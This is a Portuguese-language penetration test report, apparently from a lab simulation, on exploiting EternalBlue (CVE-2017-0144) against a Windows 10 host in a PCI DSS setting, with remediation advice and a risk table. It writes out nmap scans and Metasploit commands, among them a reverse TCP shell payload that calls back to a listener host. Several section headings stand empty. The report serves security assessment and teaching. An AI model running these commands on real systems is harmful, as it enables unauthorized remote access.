
Este relatório descreve um engajamento VAPT estruturado focado em conformidade com PCI DSS, enumeração de serviço SMB e exploração do CVE-2017-0144 (EternalBlue) em uma máquina Windows 10 dentro de uma infraestrutura voltada para finanças.
As instituições financeiras enfrentam alguns dos requisitos de conformidade mais rigorosos no espaço de segurança cibernética. Com dados sensíveis de clientes e informações de titulares de cartão em jogo, configurações incorretas de segurança podem levar a violações catastróficas. Esta simulação de VAPT foi realizada para avaliar a postura de segurança de um sistema endpoint baseado em Windows 10 sob a perspectiva de conformidade com PCI DSS, além de identificar e explorar vulnerabilidades conhecidas em serviços SMB expostos.
A simulação abrange múltiplas etapas — desde reconhecimento e varredura de vulnerabilidades usando Nessus até exploração real via Metasploit. O relatório enfatiza ainda a importância do hardening de endpoints, gerenciamento de patches, aplicação de firewalls e alinhamento com PCI DSS para manter a integridade de redes financeiras.
Preparado por: Aditya Bhatt
Cargo: Analista VAPT | Profissional de Segurança Cibernética
Contato: [email protected] | +91-9818993884
Este relatório apresenta os resultados de um teste de penetração conduzido em um endpoint Windows 10 que supostamente lida com dados financeiros e transações com cartão de crédito. O objetivo foi validar as implementações de controle do PCI DSS e identificar potenciais vetores de ataque que poderiam comprometer os dados dos titulares de cartão.
Usando Nessus, o host foi descoberto como vulnerável ao CVE-2017-0144 (EternalBlue) — uma vulnerabilidade crítica do SMB. O framework Metasploit foi então utilizado para explorar essa falha e obter acesso remoto não autorizado a um shell. Este relatório destaca a importância do gerenciamento oportuno de patches e do hardening de serviços de rede para evitar violações de dados em sistemas financeiros.
Seis objetivos principais e doze requisitos do PCI DSS foram revisados. Os princípios-chave incluem:
Sistema Alvo:
10.10.195.105255.0.0.0Ferramentas Utilizadas:
Comandos Principais:
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
Scanner:
Tentativa de Varredura Nessus:
Tentativa de Varredura Metasploit:
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
Módulo de Exploração:
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit
Gerenciamento de Patches
Hardening de Rede
Aplicação de Firewall
Monitoramento Contínuo
Conformidade com PCI DSS
Treinamento de Conscientização
Este engajamento demonstrou claramente que serviços sem patch e desatualizados, como SMBv1, podem levar ao comprometimento total do sistema usando explorações publicamente conhecidas. A vulnerabilidade EternalBlue explorada aqui é um exemplo clássico de por que a aplicação oportuna de patches, a minimização de serviços e a varredura proativa são inegociáveis em infraestrutura financeira.
Sem conformidade com frameworks como PCI DSS, as organizações correm o risco de penalidades legais e violações de dados devastadoras.
As lacunas de segurança frequentemente se escondem por trás de protocolos legados e patches esquecidos. Este engajamento reafirmou a criticidade de tratar cada serviço — especialmente aqueles como SMB — não como uma conveniência, mas como uma superfície de risco.
Uma segurança cibernética forte no setor financeiro começa com vigilância contínua, políticas aplicadas e gerenciamento de patches sem concessões.
Obrigado por ler este relatório. Espero que tenha oferecido clareza, percepção prática e reforço de por que a validação contínua de segurança é essencial — especialmente ao lidar com dados financeiros.
– Aditya Bhatt
Analista VAPT | Profissional de Segurança Cibernética
| Descrição do Risco | Impacto | Probabilidade | Pontuação de Risco |
|---|
| Exploração do EternalBlue (SMBv1) | Alto | Alta | Crítico |
| Falta de Gerenciamento de Patches | Alto | Média | Alto |
| Ausência de Controles de Acesso à Rede | Médio | Alta | Alto |
| Não conformidade com PCI DSS | Alto | Alta | Crítico |